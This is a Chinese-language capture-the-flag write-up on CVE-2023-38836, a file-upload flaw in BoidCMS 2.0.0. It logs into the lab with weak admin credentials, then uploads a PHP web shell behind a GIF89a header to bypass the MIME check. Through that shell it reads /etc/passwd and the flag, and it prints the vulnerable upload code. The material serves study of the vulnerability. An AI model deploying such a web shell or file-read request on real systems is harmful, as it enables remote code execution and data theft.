CVE-2023-38836（文件上传+命令执行）

简介

BoidCMS v.2.0.0 存在文件上传漏洞，远程攻击者可通过添加 GIF 头部绕过 MIME 类型检查，执行任意代码。

过程

打开靶场

对网站进行目录扫描

发现后台，登录弱口令账号密码

admin/password

发现文件上传位置

根据简介提示，添加 GIF 头部绕过 MIME 类型检查

上传文件代码

GIF89a
<?php system($_GET[1]);phpinfo();?>

运行

http://eci-2zec8jldo3apelqvizrr.cloudeci1.ichunqiu.com/media/minglingzhixing.php?1=../../../../../etc/passwd

上传成功，并且成功执行

直接cat /flag

结果

得到flag{4f7a065d-06e0-4d24-a8b0-bece0f097ccb}

解析

这是上传一个木马之后，找到后端文件上传函数代码

/*** Upload media file* @param ?string $msg* @param ?string $basename* @return bool*/public function upload_media( ?string &$msg = null, ?string &$basename = null ): bool {if ( ! isset( $_FILES[ 'file' ][ 'error' ] ) || is_array( $_FILES[ 'file' ][ 'error' ] ) ) {$msg = 'Invalid parameters';return false;}switch ( $_FILES[ 'file' ][ 'error' ] ) {case UPLOAD_ERR_OK:break;case UPLOAD_ERR_NO_FILE:$msg = 'No file has been sent';return false;break;case UPLOAD_ERR_INI_SIZE:case UPLOAD_ERR_FORM_SIZE:$msg = 'File too large';return false;break;default:$msg = 'An unexpected error occurred';return false;break;}$tmp_name = $_FILES[ 'file' ][ 'tmp_name' ];$finfo = new finfo( FILEINFO_MIME_TYPE );$type = $finfo->file( $tmp_name );$types = $this->_l( 'media_mime',array('application/json','application/octet-stream','application/ogg','application/pdf','application/photoshop','application/rar','application/svg+xml','application/vnd.ms-excel','application/vnd.ms-powerpoint','application/vnd.ms-word','application/vnd.oasis.opendocument.spreadsheet','application/vnd.oasis.opendocument.text','application/vnd.openxmlformats-officedocument.presentationml.presentation','application/vnd.openxmlformats-officedocument.spreadsheetml.sheet','application/vnd.openxmlformats-officedocument.wordprocessingml.document','application/zip','audio/mp4','audio/mpeg','image/gif','image/jpeg','image/png','image/svg+xml','image/vnd.microsoft.icon','image/webp','image/x-icon','text/css','text/html','text/plain','text/x-asm','video/avi','video/mp4','video/mpeg','video/ogg','video/quicktime','video/webm','video/x-flv','video/x-matroska','video/x-ms-wmv'));

在minglingzhixing.php文件里前几个字节加上GIF89a 则这个文件的 MIME 类型 将会是image/gif。由此便可绕过上传限制，实现木马上传。